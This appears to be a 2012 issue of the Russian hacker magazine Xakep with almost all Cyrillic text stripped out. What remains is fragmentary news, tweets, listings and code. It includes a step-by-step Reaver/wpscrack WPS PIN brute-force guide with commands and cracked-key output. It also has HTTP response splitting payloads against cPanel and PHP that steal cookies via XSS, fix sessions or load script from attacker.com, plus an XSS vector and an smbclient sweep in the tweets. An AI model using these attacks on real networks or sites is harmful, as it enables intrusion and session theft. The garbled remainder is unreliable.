088
WWW.XAKEP.RU
03 (158) 2012
W3AF
: 230 .
WI-FI
018
WPS,
, .
5-10
WPA-.
024
082
124
HTTP RESPONSE SPLITTING
WINDOWS PHONE 7.5?
HIGHLOAD-
NGINX DJANGO
Intro
3 768
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE
PR-
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(alik@glc.ru)
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
,
- .
,
.
,
~50
WINLINK.
,
.
,
, ,
3 768
, . : 250 , 50 , 1.2
. ,
,
, , : .
,
.
, (5 ) ,
, , 30 ! ,
!
: :).
P.S.
. :).
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag
03/158/ 2012
.: (495) 935-7034, : (495) 545-0906
TECHNOLOGY
(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .
.
. ,
, . .
.
: content@glc.ru.
, , 2012
001
Content
008
HEADER
004
011
MEGANEWS
hacker tweets
-
14
QR-
016
017
Proof-of-concept
: Pastebin.com
COVERSTORY
030
COVERSTORY
COVERSTORY
018
024
Wi-Fi
10
WPA Wi-Fi
WPS
048
070
PCZONE
038
042
048
?
-
CAPTCHA
-
w3af
UNIXOID
104
108
110
052
056
062
066
070
074
Easy-Hack
PHP- Windows
I can crack it!
-,
SMS: 30 !
X-Tools
SYN/ACK
114
120
124
076
082
2011
130
138
094
096
100
Google Chrome
Google
/++
,
!
USB 3.0
Edifier R2500
2.0
WEXLER.BOOK T7055
, ,
140
143
144
088
nginx Django
FERRUM
136
MALWARE
Linux-
-
Fedora
Linux
110
FAQ UNITED
FAQ
8.5
WWW2
web-
MEGANEWS
WPS
WPS (Wi-Fi
Protected Setup)
,
US-CERT.
,
D-Link, Netgear, Linksys Buffalo.
,
PIN-,
.
PIN, ,
, Wi-Fi .
US-CERT :
PIN-
,
EAP-NACK .
, ,
PIN- .
, PIN-.
,
:
10^8 10^3 + 10^4, 11 .
Cover Story .
,
,
,
.
,
WPS.
( YOTA)
LTE .
63
,
150.
USB 3.0
, ,
. CES ,
2012 2013 .
LINUX MANDRIVA,
NGI,
.
,
.
GOOGLE
. British
Telecom
.
, APT-,
Sykipot, , ,
-, .
, -
.
Sykipot AlienVault.
ActivIdentity ActivClient,
-, .
PIN-, .
AlienVault ,
2011 ,
.
PIN-. Sykipot
.
, , ,
.
WINDOWS PHONE
MARKETPLACE
50 .
14
(Android Market
19).
IPHONE DEV-TEAM,
-,
iOS 5.01
iPhone 4S iPad 2.
.
,
- ?
SOPA
PIPA
RAZER
:
10,1
1280 x
800 ,
Dolby
7.1 (
THX),
Wi-Fi 802.11b/g/n
Bluetooth 3.0.
.
Razer ( )
. , , Razer.
Project Fiona ,
CES 2012.
, , , .
(
) . , . , Project Fiona
Intel Core i7 . , Intel.
,
-
. , , . Razer . ,
.
$1000.
- .
ZAPPOS.COM 24
,
SOPA (Stop Online Piracy Act) PIPA
(PROTECT Intellectual Property Act),
, .
, , : (,
, .)
( )
.
,
. .
. , ,
, ,
.
, . , ,
. , , MPAA, RIAA
BSA ( Microsoft, Apple, Adobe,
Intel . .). Google, Twitter, Mozilla,
Facebook, Yahoo, eBay . X,
,
.
, ,
.
,
. Reddit . Google
. WordPress. blackout
.
SOPA. ,
GoDaddy, SOPA, -: GoDaddy.
,
TechCrunch , GoDaddy
- SOPA... ,
.
BSA, , SOPA . ,
, ,
.
SOPA 18
blackout,
. ? , SOPA, ,
, .
. PIPA . ? .
,
, ,
. . .
BUFFALO CLOUDSTATION
1
7
Buffalo
.
Windows,
MAC OS.
Time Machine.
Buffalo CloudStation
NAS.
: ,
.
BitTorrent-
iOS Android
(15017545 ),
,
, .
Webaccess
,
Buffalo.
,
: ,
.
Buffalo CloudStation
. ,
, ,
,
.
SATA-II
1 2 .
26 .
,
4
,
.
NAS', Buffalo
CloudStation BitTorrent-
web-.
p2p-: .
HMEI7 , Siemens.
QR-
MEGAUPLOAD
Megaupload, , , 4% -.
, , , .
Dotcom
. : 20 , 20
! ,
.
.
, Megaupload
. $500 .
,
( -)
$175 .
: , -
FileSonic
(, , ):
, , .
Anonymous
, , , RIAA,
MPAA , -
.
. QR,
,
.
Websense ThreatSeeker Network -,
QR-. , - .
2tag.nl , QR- URL. ,
QR-, .
QR-,
, (
QR-).
:
. ,
.
comScore, 14
18
34
QR-.
QR-
.
THUNDERBOLT
WINDOWS.
DigiTime. ( ), ,
Sony, Asus, Gigabyte Technology ASRock,
Thunderbolt .
.
IPV6-
2013 .
2015 IPv6
.
ANDROIDINVASION
GOOGLE , Google
.
,
GROUP-IB,
.
, IT-:
, Linux.
):
( ):
-
5
"
,
"
:
,
e,
Ariadn
.
, (
Group-IB) :
,
. , ,
:
iPad 2 Wi-Fi 3G 16 Gb.
,
.
:
.
!
:
www.xakep.ru/post/58241/
!
!
FACEBOOK Windows,
SAMSUNG PLS-
-
CES 2012
. CES , , , ,
.
, ,
S27B970 Samsung, 9-
-. 27-
, PLS (Plane Line
Switching). , IPS (In-Plane Switching)
Samsung. IPS-
, -
.
Samsung, , : PLS-, ,
,
, . . ,
Samsung .
S27B970 ,
(
- USB-),
.
9- 10 ,
.
QHD (2560 x 1440), DisplayPort,
Dual Link-DVI HDMI, 7 Mobile High Definition
Link (MHL)
.
Samsung Natural Color Expert,
. S27B970
,
,
- . , -
, Samsung 9
. ,
(!)
. -, ,
.
, (
),
. , .
, PLS
,
,
: PLS-
.
, ( , ,
). S27B970
$1199.
: 2560 1440
: 1,07
: 300 /2
(.): 90%
():
1000:1
(GTG): 5
(/.): 178/178
APPLE SAMSUNG
ELECTRONICS ,
GALAXY TAB 10.1
(!)
#hacker tweets
@NeckbeardHacker:
linux.js. ,
JavaScript-
Linux.
?
@cBekrar:
Vupen
PWN2OWN.
,
...
@meder:
: CVE-2011-3923.
Struts2: http://bit.ly/yFjhxr.
:
,
. , , Java
, RCE- ( ,
Java ), !
...
@RolfRolles:
-:
http://bit.ly/zIqZ5K .
:
... , ,
.
PhoneAndroid:
, -: ...
bit.ly/yoLmba.
Chroot-ing Windows
, :, :, :...
http://bit.ly/yQQqmN.
:
, ...
:
;).
@_sinn3r:
@cBekrar:
#fail-
McAfee Security-as-a-Service,
ActiveX,
bit.ly/xbJtqP via @thezdi.
obj.ShowReport
"calc.exe". ... .
, 0-day ZDI 12 . :) ...
@martincronje:
: HTML5 !=
CSS JavaScript-
jQuery.
@i0n1c:
,
!
...
...
@mikesica:
, ,
.
@jcran:
-- irb> (1..254).each
{|x| puts "host - 10.0.0.#{x}";
`smbclient -L 10.0.0.#{x}
-Uguest -N`}.
:
@f0rki:
PHP :
perchance (condition) { // Code
here } otherwise { // Code here }.
@garethheyes:
XSS- : <xml
ID=xss><x><IMG src=1
onerror=alert(1)></x></
xml><SPAN DATASRC=#xss DATAFLD=$Text
DATAFORMATAS=HTML></SPAN>.
Ruby- ...
@roman_soft:
@stephenfewer:
'Frinder' http://bit.ly/xrUBiW.
@Ivanlef0u:
BinScope:
http://bit.ly/yzcQYR .
NX, SafeSEH, /dynamicbase, . .
(CSDN).
,
,
,
- .
,
.
, (,
, ). ,
,
, . ,
, .
: ,
.
. !
. . :) , ,
.
. , . , , -
, , ,
.
: webpolit.livejournal.com/72397.html.
Seagate
Samsung .
$1,375 .
NGINX
,
Microsoft IIS. NetCraft,
Apache
(57,93 %).
BSOD WINDOWS 7
Windows 7 x64
w3bd3vil.
win32k.sys
( Win XP),
. , 32-
, 64-
- BSOD,
.
: ,
, ,
. , HTML-. Safari ,
.
iframe
. 64-
Windows 7, , ,
.
.
TORRENTFREAK , Crysis 2
BitTorrent PC
2011 . Call
of Duty: Modern Warfare 3
Battlefield 3.
Twitter
Google . Google .
MICROSOFT,
ARM-
.
, EDIFIER
Microsoft
,
. , .
2011- Microsoft ,
Windows 8 Secure boot (
UEFI). : UEFI
. , , , UEFI. ,
. Linux-
,
Linux ,
- Linux Windows 8
.
Microsoft ,
Linux ,
, . ,
Windows,
. ,
.
Microsoft ,
Windows 8. , ,
. .
, Windows 8 ,
116: , ARM, Secure Boot
.
Secure Boot , Pkpriv.
Secure Boot UEFI
,
.
, Microsoft ,
Secure Boot,
, ARM-. , ARM,
.
Linux ( ) . ,
, Windows 8,
Linux .
: ?
, .
,
. ,
UEFI, .
, , Microsoft
, Linux, Android ARM-.
Edifier
. 2.0.
- R1500TM ,
. Edifier
( ), -
18- . ,
RCA, , .
R900T.
2.0-, 4-
- 13-
, ,
. R900T
: 140 226 197 .
3,5-
RCA RCA RCA,
, , .
:
Edifier
12
.
.
.
MEGASEARCH.CC
,
!
,
PWN2OWN
Pwn2Own,
,
(,
) . ,
. Microsoft
Internet Explorer, Apple Safari,
Google Chrome Mozilla
Firefox Windows 7 Mac OS Lion
( ).
.
Hewlett-Packard.
60 , 30
15
, .
Google
Chrome. 20 sandbox-
Chrome. 10
sandbox- Chrome,
.
,
Pwn2Own. , .
.
,
.
Pwn2Own 7 9 . , !
D- , .
( ,
iModela)
,
, .
, , .
, .
-
The Pirate Bay
3D-, -
.
- ,
.
Warhammer 40 - 1970 .
, , 3D- .
,
!
, ,
. ,
.
3D-
RepRap
,
.
Mendel,
(
).
$520.
SONY
XQD.
, .
\
XQD
1 / (125 /).
.
QD-H16 16
$130, QD-H32 32 $230.
.
FACEBOOK HACKERCUP,
.
- Facebook,
.
TIOBE SOFTWARE
OBJECTIVE-C
.
-
Java, C,
C# C++.
SYMANTEC
Symantec,
,
, . Symantec,
, 2006 .
, .
, Norton Antivirus Corporate Edition, Norton
Internet Security, Norton SystemWorks pcAnywhere 12.0,
12.1 12.5. ,
Yama Tough, ,
Lord of Dharmaraja, ,
Norton Utilities.
,
,
Norton Antivirus. , ,
1999 . , Symantec ,
. .
,
. ,
Symantec ( ).
,
, ,
. Symantec
,
scareware-, , .
Symantec,
, , .
, ,
.
LUMINANT MEDIA
93-
ANONYMOUS
HEADER
.
.
KeyPass (keepass.info),
.
,
, . ,
,
? :)
, ,
, KeyPass,
, !
.
1Password (agilebits.com/onepassword), Mac,
Windows.
, $69.99
. , . , -,
LastPass (lastpass.com),
. ,
. -,
(Windows, Linux, Mac),
.
(Firefox, Internet Explorer, Chrome, Safari,
Opera). ($1 )
. -, LastPass
,
,
.
- ,
.
- ,
. -, LastPass ,
Dropbox.
- ( ),
. ! :)
LASTPASS
, LastPass, .
, .
LastPass ,
. , Sesame
-.
. -,
Sesame .
, ,
-. !
LastPass
Sesame ( ), ,
, .
Google
Yubikey $25
(store.yubico.com), Google. ,
(Google Authenticator),
.
Gmail,
LastPass.
(helpdesk.lastpass.com/security-options/google-authenticator).
,
.
$12
.
LastPass
LastPass
,
, . LastPass
, ( 123456). ,
,
.
Proof-of-Concept
PASTEBIN.COM
- Pastebin.com.
,
,
. .
, .
Lulzsec
( , ) Pastebin.com.
. (pastebin.com/trends) , :
- Facebook;
- , e-mail
;
IP-
.
:
.
. .
, , ,
.
, , Pastebin.com, :
Pastie, FrubarPaste, YourPaste, Codepad, Slexy
LodgeIt. PoC
. ,
,
.
, , .
: , malc0de (bit.ly/An58Yd)
NeonTempest (bit.ly/zRuK7o). , ,
PastyCake 9b+ (bit.ly/xHXdfH),
.
Pastebin.com Pastie.org ,
.
SQLite.
MongoDB MySQL. -
Python, :
python gather.py -k kwords -o urls.db \
-a ~pastycake@gmail.com~ harvest
'harvest'
.
e-mail.
-o
. -k
,
. , ,
, . ,
, , .
,
PastyCake, , :
DEFAULT_KEYWORDS = [
'password',
'hack',
]
,
, .
.
, ,
.
, Twitter- PastebinLeaks (twitter.com/#!/PastebinLeaks), -
Possible Massive mail/pass leak
http://pastebin.com/L6YbD136
Possible listing of http passwords
http://pastebin.com/qZbccMB7
Possible Juniper configuration with
password http://pastebin.com/9vuwzjnS
..
Python
Trending Pastes ?
,
. z
COVERSTORY
(ivinside.blogspot.com)
WPA-
WI-FI
WPS
HOWTO: Wi-Fi 10
HOWTO:
WI-FI
10
, ,
WPA2, .
. - ,
, GPU. ,
,
WPS.
WWW
WARNING
,
Google
Docs:
goo.gl/3zjfP
.
.
PIN- bruteforce. .
WPS
PIN- WPS
1. PIN- WPS,
,
,
. ,
.
,
,
,
.
, ,
.
/
. ,
.
WPS (Wi-Fi Protected Setup).
,
, - WPA-.
PIN,
, !
. WPS.
. ,
WPS (, ,
), PIN
!
2. PIN- WPS
() (),
.
.
2. PIN- -.
PIN- ,
( 1),
.
,
.
3. PIN- ( 2).
WPS,
,
PIN-. .
.
! ,
, PIN-
,
10^8 (100 000 000) . . ,
PIN- , .
10^7 (10 000 000) .
! WPS (
3). , ,
. , PIN-
.
, ! :
1. M4 EAP-NACK,
, PIN-
.
2. EAP-NACK M6, , ,
PIN- . 10^4 (10 000)
10^3 (1
000) .
11 000 .
, ,
.
3.
. WPS-:
WPS?
WPS .
.
, -
.
(, ):
PIN, . ,
(Cisco/Linksys,
Netgear, D-Link, Belkin, Buffalo, ZyXEL)
WPS. .
WPS:
1. Push-Button-Connect (PBC).
3. WPS
, .
-, M3.
,
,
. ,
,
.
wpscrack (goo.gl/9wABj), Python.
Scapy, .
Linux-,
.
, MAC- , MAC-
(SSID).
$ ./wpscrack.py --iface mon0 \
--client 94:0c:6d:88:00:00 \
--bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
attempt took 1.08 seconds
trying 18670004 # found 1st half of PIN
attempt took 1.09 seconds
trying 18670011
attempt took 1.08 seconds
<...>
trying 18674095 # found 2st half of PIN
<...>
Network Key:
really_really_long_wpa_passphrase_good_luck_cracking_this_one
<...>
,
PIN-, ,
. ,
,
(61 )
.
, wpscrack
,
:
Tactical Network Solutions. ,
PoC ,
Reaver (code.google.com/p/reaver-wps).
WPS-PIN PSK-, ,
.
.
,
WPS .
HOW-TO
, Linux.
, Reaver BackTrack
(backtrack-linux.org),
-
- WI-FI
1. WEP (Wired Equivalent Privacy)
.
,
RC4.
airodump-ng
aircrack-ng, .
wesside-ng,
WEP
.
2. WPA/WPA2 (Wireless Protected Access)
-
WPA/WPA2 (
WPA Handshake,
). ,
. , ,
, NVIDIA
CUDA ATI Stream
GPU. aircrack-ng ( ),
cowpatty ( ), pyrit
( ).
4. - PIN- WPS
.
.
0.
BackTrack 5 R1
VMware
ISO. .
,
UNetbootin (unetbootin.sourceforge.net) :
, ,
, .
1.
root:toor. ,
(
BackTrack GNOME, c KDE):
# startx
2. Reaver
Reaver,
.
(Applications Internet Wicd Network
Manager). ,
:
# apt-get update
# apt-get install reaver
, 1.3,
. , ,
, , SVN. , ,
(
).
$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
# make install
BackTrack
.
Arch Linux, ,
, PKGBUILD:
$ yaourt -S reaver-wps-svn
3.
Reaver :
;
;
MAC- (BSSID);
, WPS.
,
:
# iwconfig
( wlan0) ,
( ,
Reaver, ).
:
# airmon-ng start wlan0
,
(
mon0).
BSSID.
airodump-ng:
# airodump-ng mon0
.
WPA/WPA2
PSK. ,
.
,
kismet,
. ,
WPS. Reaver (
SVN) wash:
# ./wash -i mon0
, .
-f cap-, ,
, airodump-ng.
Reaver BackTrack wash. ,
.
4.
PIN. Reaver
.
(
) BSSID
:
-vv
, ,
.
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50 (ESSID: linksys)
[+] Trying pin 63979978
PIN , ,
, .
. ,
PIN,
. , :
[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: 'MyH0rseThink$YouStol3HisCarrot!'
[+] AP SSID: 'linksys'
, ,
WPA-PSK, . ,
.
5. c Reaver
WPS . , ,
.
, , ,
, . ,
,
. ,
WPS
PIN-,
90 . ,
,
? z
FAQ
?
,
A ,
.
Aircrack-ng (bit.ly/wifi_adapter_list). ,
,
RTL8187L. USB
$20.
"timeout" "out of order"?
-
A
. ,
WPS.
Reaver
, WEP
?
WEP
A
,
(IV),
. ,
- , -
.
WPS
Reaver
PIN-. -
,
,
WPS-. WPS
. ,
,
,
.
ALFA Network
dBi, ,
.
MAC-?
, MAC A mon0,
.
, , wlan0.
Q
A
Reaver
PIN, ?
,
WPS. -
wash: ,
.
Q ?
-
A ,
.
"rate limiting detected"?
,
A WPS.
(
),
(
).
Reaver
1.3, -
.
'--ignore-locks'
SVN.
Reaver
?
,
A ,
,
REAVER
HOWTO
Reaver. WPS
,
. ,
.
5. WPS
, , . Reaver
315 ,
:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
1. SSID :
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. '--dh-small',
,
:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
3. .
:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
6. WPS
PIN-,
. Reaver ,
'--nack':
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. '--eap-terminate' ,
WPS- EAP FAIL:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
4. .
:
8. WPS- ,
PIN-,
. Reaver ,
'--fail-wait':
COVERSTORY
DVD
.
, 2002
HTTP- ,
,
.
,
PHP.
WWW
INTRO
: .
, . ,
-
, , , .
(, eval) ,
$_GET['aaa']. ,
. , ,
, .
? ,
- , , .
,
, ,
HTTP Response Splitting.
HTTP-. - ,
HTTP- (
).
, , HTTP-
. ,
HTTP-
, Cache Poisoning, Cross-site Scripting (XSS) , , Page Hijacking.
cPanel 2010 .
, header("Location:
".__).
:
http://server.com:2082/login/?user=foo&pass=bar&failurl=%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Ealert%28%22Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/script%3E%3C!--
XSS:
HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 206
Location:
Content-Type: text/html
<script>alert("Recognize-Security - "+document.cookie);</script><!--
Content-type: text/html
<html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=
Content-Type: text/html
<script>alert("Recognize-Security "+document.cookie);
</script><!--"></head><body></body></html>
, -
header("Location: ".$_GET['backto_url']) header("Location: /index.php?lang=".$_GET['lang']). Open Redirect,
. ,
HTTP
Response Splitting, ,
PHP ( 2006- ) %0d%0a .
,
.
header() , , ,
.
DISCLAIMER
ZeroNights, . ,
,
, cookies.
, ,
, smuggling-,
.
HTTP
( HTTP), , HTTP-.
bit.ly/r9pLL, 6 Response (bit.ly/BEAq4).
HTTP- :
RFC-2616
Response = Status-Line               ; Section 6.1
           *(( general-header        ; Section 4.5
            | response-header        ; Section 6.2
            | entity-header ) CRLF)  ; Section 7.1
           CRLF
           [ message-body ]          ; Section 7.2
,
CRLF, . URL CRLF %0D%0A.
. ,
CRLF,
.
CRLF PHP
header() (bit.ly/wVbbcd) PHP
HTTP- . . , -
<?php
header("Location: /basic/".$_GET['redirect'].".html");
?>
Warning, :
test.php?xxx=bbb%0a%0dNew-Header:blabla
Warning: Header may not contain more than a single header, new line detected. in test.php on line 2
,
. ,
:
/* new line safety check */
char *s = header_line, *e = header_line + header_line_len, *p;
while (s < e && (p = memchr(s, '\n', (e - s)))) {
    if (*(p + 1) == ' ' || *(p + 1) == '\t') {
        s = p + 1;
        continue;
    }
    efree(header_line);
    sapi_module.sapi_error(E_WARNING, "Header may not contain more than a single header, new line detected.");
    return FAILURE;
}
,
LF ( URL- %0A). , - (%09) (%20), . ,
CRLF, LF-. RFC,
, . , RFC
? , . - :
,
Refresh-
<?php
header("X-Test1:1\r\n Set-cookie: is1=OK");
header("X-Test2:2\r\n\tSet-cookie: is2=OK");
echo "<script>alert(document.cookie)</script>";
?>
, Internet Explorer
. , - RFC
, ,
header() IE, ,
Open Redirect. .
.
header() 2006
,
.
Internet Explorer. , .
, PHP %0a (\n LF).
, - ,
.
.
:
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
. . .
listen SERVER, 10;
my $answ = "HTTP/1.1 200 OK\r\n";
for(my $i=0;$i<256;$i++){
$answ.="Set-cookie: cook-$i=1".chr($i);
}
$answ .="\r\n\r\n<h1>Test splitting bytes</h1>";
. . .
: ,
- (, ,
) ,
CRLF (%0d%0a). -,
HTTP- ,
Set-cookie, 256 .
, - ,
, ,
<N>Set-cookie:... , ,
, , , . ,
, :-). ,
( ).
:
IE 8/9 %0d
Firefox 7 Opera %0d
Chrome %0d %00 (Issue 95992 fixed in rel. 15)
Safari %0d
, , Firefox, CR , CRLF.
,
,
- -! , ,
, 14- Google Chrome,
-
setcookie()
setcookie()
-. . 95992 Low (
,
, , , ).
15- - ,
, , 17-
. Firefox ,
, RFC. ,
.
XSS
header(),
.
.
client-side-: ,
.
, Content-Length,
, HTTP-.
header() PHP Content-Length 0, . ,
HTTP Response Splitting ( HTTP-)
, Content-Length .
, . , Internet Explorer,
, HTML- , Content-Length.
6- 9- .
-:
<?php
header("X-Header: aaa".$_GET['r']);
?>
Internet Explorer
HTTP-:
/index.php?r=foobar%0d<html>%0d<h1>TEST</h1>
. , .
XSS-,
:
/index.php?r=foobar%0d<html>%0d<script>alert(/Splitting/)</script>
, - , . ,
,
. XSS- Internet Explorer,
9-
, , , X-XSS-Protection: 0. ,
,
.
HTTP- :
/index2.php?r=foobar%0dX-XSS-Protection:0%0d<html>%0d<script>alert(/xss/)</script>
. IE , X-Content-Type-Options,
. . : ( Content-Length).
, header("Location: /index.php?lang=".$_GET['lang'])
Open Redirect
?lang=aaa%0dLocation:http://yandex.ru. ,
, .
( ), .
, Access-Control-Allow-Origin ,
, Opera,
Internet Explorer 8+, Firefox 3.5+, Safari 4+ Google Chrome.
(mzl.la/4srnwm).
,
Access-Control-Allow-Methods, Access-Control-Allow-Headers, Access-Control-Max-Age (
).
, , . Access-Control-Allow-Origin ,
. , , , XHR . ,
Access-Control-Allow-Origin: *
.
RFC, , ,
, , , .
Internet Explorer HTTP-.
,
, .
, Content-Length
, , RFC, HTTP
. ,
, .
, header(). , - ,
. , , : header(), setcookie() setrawcookie().
, ,
header(), $path $domain.
,
. ,
. .
,
header():
, Content-Length, , HTTP-
.
, , X-XSS-Protection,
XSS- Internet Explorer,
1. X-Frame-Options. ,
iframe/frame-.
X-Frame-Options:
allow-from attacker.
2. X-Content-Security-Policy.
,
. ,
X-Content-Security-Policy: allow 'self', <script src="http://attacker.com/1.js"><script>
. ,
X-
,
, ,
.
: foobar:%0dSetCookie:PHPSESSID=FAKED%0dLocation=/
auth.php. ,
,
.
99 % -
Session Fixation (
).
IE HTML- Content-Length,
return FAILURE;
}
if (!url_encode && value && strpbrk(value, ",; \t\r\n\013\014") != NULL) {
    /* man isspace for \013 and \014 */
    zend_error( E_WARNING, "Cookie values can not contain any of the following ',; \\t\\r\\n\\013\\014'" );
    return FAILURE;
}
strpbrk() ,
. ,
.
.
(, ) strpbrk (php.su/functions/?strpbrk),
. , ,
- ! , PHP
,
- ,
. - .
, . ,
, = .
( 2010
).
COOKIES
- , ,
. setcookie() setrawcookie()
.
. , .
,
, .
, .
,
, .
, , :
<?php
setcookie("param0","PREFIX_".$_GET['p0']);
?>
4096 . , .
! ,
, .
Session Fixation.
:
XSS- IE
chrome 4096
safari 4091-LEN(cookie_name)
opera 4096
firefox 4096
iexplore 5116-LEN(cookie_name)
, RFC: www.ietf.org/rfc/rfc2109.txt.
RFC at least
20 cookies per unique host or domain name. , 20 20
. . , 1997-
, ,
, .
, RFC, ,
, , .
:
chrome 180
safari ~2800/LEN(cookie_name+cookie_val)
opera 60
firefox 149
iexplore 49
OUTRO
, .
,
HTTP Response Splitting, . ,
.
(oxod.ru).
! z
COVER STORY
rabota.ru,
.Ru.
@Mail
il.Ru Group.
- Ma
PRUFFI.
.
, ,
. ,
.
. ,
.
, , .
, .
, Gmail -
.
, ,
Google. :)
, . ,
PRUFFI .
. 5060
, .
800 .
PRUFFI 60 000 90 000 . . :)
PRUFFI FRIENDS
- .
?
, .
, ,
15
:
, .
,
.
.
PRUFFI Friends (apps.facebook.com/pruffi_friends). , . ,
.
,
:
,
.
.
.
,
. ,
800 ,
?
,
?
.
. , , .
. ,
.
, .
. , ,
,
. -
,
,
1000 .
.
.
, ,
.
PRUFFI .
: 400
. 600 .
- : , - 700
1,5 .
,
(pruffi.ru/analitika). , , 3040 % , . ? .
, Ruby
100
, ,
.
Ruby- 60 ,
, .
,
.
?
!
, IT .
, .
,
20 , !. ,
.
, ,
.
, (Product Manager'),
, 30. ? ,
. ,
. :) :
,
( ), . ,
. .
,
.
-, :
,
.
- !
. HR-: ,
.
. ,
. :)
. .
. .
, ,
.
Facebook Google,
Foursquare, LinkedIn
. , ,
LinkedIn, - , Groupon.
! ,
.
, . ,
, .
( -)
, ,
. Zynga
, .
Zynga,
, .
.
PRUFFI
.
.
: $500 000
$500 000.
.
,
,
: ,
,
.
!
. ,
,
.
,
, ,
( /IT,
, , ). ,
, , ,
,
.
, .
.
. , ,
, -,
. .
? , , -,
,
(iOS,
Android, Symbian, Windows
Phone), .
.
.
.
:
PM (Product manager),
, PM,
. , ,
. :
, ,
. :
,
,
.
. , Omlet.ru,
Enter.ru . . .
.
, .
, . ,
.
. , , ,
,
.
Ostrovok.ru.
.
,
, .
, ,
. , , .
,
:
.
,
200 000 .
. , , ,
180200 .
100120
.
, - 140
. .
.
,
,
. . .
. ,
,
,
.
.
.
, , .
.
, PM
. ,
,
. . ,
. ,
-
, .
, ,
. :) ,
,
Molotok.ru,
Mail.ru.
:
1. Ruby 86 %,
40 %.
2. , , , .
3. .
4. , e-commerce,
50 %.
.
iOS Android. ,
-
.
, .
.
, ,
, ,
.
.
, .
, ,
. , - .
. ,
.
,
. :
,
.
, . Mail.ru :
, ,
.
,
.
, Mail.ru Group
. ,
. Futubra (futubra.com).
.
:
.
. .
, .
.
.
.
PHP-
Perl-.
Perl, , , . , Ruby,
Perl ,
C++ Java.
. . .
NDA (Non-disclosure
agreement ).
.
: ,
. - .
, . ,
- .
. . , Mail.ru,
, , .
, .
,
, -
. , . ,
- .
. , .
-
. ,
.
. ,
.
: .,
,
, .
, ,
Ruby. , .
: ,
HR-, , ? .
, .
,
,
. .
,
, .
: , ! !
, . ,
- ,
.
,
. .
, ,
,
.
.
, ,
. , ,
,
,
.
,
,
.
- ,
, .
. HR 90
. :
60 120
.
150, 60. .
1015 , 34
. HR
: .
. ,
. Google
,
.
.
.
, ,
, ,
,
.
, , . ,
.
,
. , , .
, .
: ,
, ,
. ,
, ,
!. .
. , , PM, ,
.
, .
, , !
.
.
,
.
,
, , ,
, ,
.
?
, , ,
- , . , ,
.
. , .
.
, 19
: !
. ,
,
,
.
. ,
.
, .
. 30 . ?
, ,
.
, ,
:
,
, .
. , . , .
, ,
. ,
, .
, , ,
. ,
, .
,
,
,
.
,
.
, Mail.ru, - , .
,
.
, ,
. :
, . :
,
,
,
. -
. , :
,
. , ,
, , ,
- .
, 2829 , .
.
.
,
.
, Greenfield Project.
, . , ,
,
.
. ,
Mail.ru, Google
.
,
.
,
,
. ,
. ,
! :)
, , -
. .
, . ,
,
.
.
,
? , . ,
,
PRUFFI ,
.
, ,
, . z
(112011)
0-3
3-5
5-10
10
Team leader
40 000 - 80 000
30 000 - 70 000 *
Android, iOS
30 000 - 70 000
20 000 - 70 000 *
Perl/PHP
40 000 - 60 000
30 000 - 60 000 *
Ruby on Rails
30 000 - 60 000
0-3
3-5
5-10
10
Windows
30 000 - 50 000
50 000 - 70 000
Unix,Linux admin
30 000 - 60 000
20 000 - 60 000 *
60 000 - 90 000
60 000 - 90 000 *
40 000 - 80 000
40 000 - 80 000 *
0-3
3-5
5-10
10
40 000 - 80 000
40 000 - 80 000 *
Flash-
40 000 - 80 000
40 000 - 80 000 *
Game producer
40 000 - 70 000
40 000 - 90 000 *
PRUFFI (www.pruffi.ru/analitika)
GAME
50%
50%
50%
Preview
33 .
.
PCZONE
38
?
,
-?
eBay!
.
.
.
,
.
-
.
PC ZONE
I can
crack
it!
42
CAPTCHA.
, OCR-?
70
--
,
.
48
, ,
, ,
IDS ,
w3af.
66
MALWARE
76
2011
.
?
82
Windows Phone 7.5
. ?
Microsoft.
PC ZONE
(biohedge@gmail.com)
?
Android?
? , , ?
? ,
, ,
-. , ,
.
MADE IN CHINA
Made in China
, .
, ,
. ,
DealExtreme.com,
.
.
,
, .
,
.
,
, ,
-
, . ,
, . ?
FocalPrice.com
:
:
( )
:
14 25
70 000 100 (, ). , .
, ,
, .
( ),
( , ).
, , .
, eBay (-,
,
). ,
-.
,
, - ,
.
,
,
.
,
, .
,
, .
PayPal.
